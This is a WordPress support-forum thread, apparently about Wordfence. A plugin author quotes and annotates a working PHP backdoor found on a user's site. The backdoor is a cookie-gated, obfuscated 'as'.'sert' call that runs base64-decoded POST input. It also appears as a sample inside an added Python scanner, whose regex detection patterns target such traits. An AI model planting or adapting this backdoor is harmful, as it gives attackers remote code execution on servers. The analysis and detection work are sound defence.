Hi @ign2009,
You should immediately remove that file and run further scans on your website.
Looking at the code, it is a backdoor that allows attackers to execute code on your server remotely.
//only allows the attacker who uses a special token for the ssid cookie
if ((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")) {
    error_reporting(0);
    //remotely executes code from $_POST
    @array_map("as"."sert", (array) base64_decode($_POST[x]));
}
//probably an easy way for the attacker to see if your website has the backdoor installed or not
if ((@$_COOKIE[wprid]=="59857777ad9b3")) {
    die(md5('ok'));
}
Dave
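The snippet Dave quotes shows the traits a site owner can look for when hunting for more copies of the same kind of backdoor: a function name split with string concatenation ("as"."sert") so a naive grep for assert misses it, a callback dispatcher (array_map) used to invoke it, base64-decoded request input fed into it, an md5 check on a cookie acting as an access gate, and error reporting switched off. The scanner below is an added example written for this thread; it is not code from the post, from Wordfence, or from WordPress. It first rejoins concatenated string literals and then matches each trait as a separate indicator, so a file is flagged on the combination rather than on any one function that also has legitimate uses. The two PHP samples are constructed for the demonstration; scan_tree() is the helper you would point at a real web root.

```python
"""Heuristic scanner for PHP backdoor traits such as those in the quoted snippet.

Added example for this thread; not Wordfence, WordPress, or forum code.
The PHP samples below are constructed so the script runs offline. To check a
real site, call scan_tree("/path/to/webroot") instead.
"""
import re
from pathlib import Path

# Rejoin adjacent PHP string literals, e.g. "as"."sert" -> "assert", so that
# split-up function names cannot slip past the keyword indicators below.
_CONCAT = re.compile(r'''(["'])([A-Za-z0-9_]+)\1\s*\.\s*(["'])([A-Za-z0-9_]+)\3''')

# Each indicator is one trait of the quoted backdoor. None is damning alone;
# the verdict is based on how many co-occur in a single file.
INDICATORS = {
    "eval_like_function": re.compile(r"\b(?:assert|eval|create_function)\b"),
    "callback_dispatch": re.compile(
        r"""\b(?:array_map|call_user_func(?:_array)?)\s*\(\s*["'](?:assert|eval|create_function)["']"""
    ),
    "decoded_request_input": re.compile(r"base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "hashed_cookie_gate": re.compile(r"md5\s*\(\s*@?\$_COOKIE\b"),
    "error_suppression": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}

# Constructed sample 1: the backdoor as quoted in the thread (values from the post).
SUSPICIOUS_SAMPLE = '''<?php
if ((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")) {
error_reporting(0);
@array_map("as"."sert", (array) base64_decode($_POST[x]));
}
if ((@$_COOKIE[wprid]=="59857777ad9b3")) {
die(md5('ok'));
}
'''

# Constructed sample 2: ordinary code that also reads a cookie, to show the
# scanner does not fire on legitimate cookie handling.
BENIGN_SAMPLE = '''<?php
$lang = isset($_COOKIE['site_lang']) ? sanitize_key($_COOKIE['site_lang']) : 'en';
echo esc_html($lang);
'''


def normalize(source: str) -> str:
    """Collapse chained literal concatenations until nothing more changes."""
    prev = None
    while prev != source:
        prev = source
        source = _CONCAT.sub(lambda m: f'"{m.group(2)}{m.group(4)}"', source)
    return source


def scan_php_source(source: str) -> list[str]:
    """Return the names of the indicators present in one PHP file's text."""
    text = normalize(source)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def classify(findings: list[str]) -> str:
    """Two or more co-occurring indicators is treated as suspicious."""
    return "suspicious" if len(findings) >= 2 else "clean"


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a directory of PHP files and report only files with findings."""
    results = {}
    for path in Path(root).rglob("*.php"):
        findings = scan_php_source(path.read_text(errors="replace"))
        if findings:
            results[str(path)] = findings
    return results


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = scan_php_source(sample)
        print(f"{label}: {classify(found)} {found}")
```

Because the match runs on the normalized text, the same file grepped for the literal word assert would come back empty while the scanner still reports it; that gap is exactly why the backdoor author wrote "as"."sert". Treat a hit as a reason to inspect the file and compare it against a fresh copy of the plugin or theme, not as proof by itself.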
Jan444 (@ign2009), Thread Starter
Hi Dave, many thanks. I was all day dealing with this. I performed scans with WordFence, removed offending files (some were newly created with strange characters, others were modified with eval injections), and cleaned old themes and plugins.
Re-installed WordPress, removed old installs, updated all plugins and themes everywhere, updated WordPress everywhere, removed lots of un-used themes.
Now the scans are showing all is fine.
I’ll wait and see but I’d say the situation is under control as no other “suspicious file modification” warning has popped up for the last hours, which was the way I noticed the problem.
Thanks for your great plugin!
Cheers,
Jan
That’s great! You’ve definitely taken all the necessary precautions to secure your site.
Please let us know if there’s any new suspicious activity on your site here.
Thanks!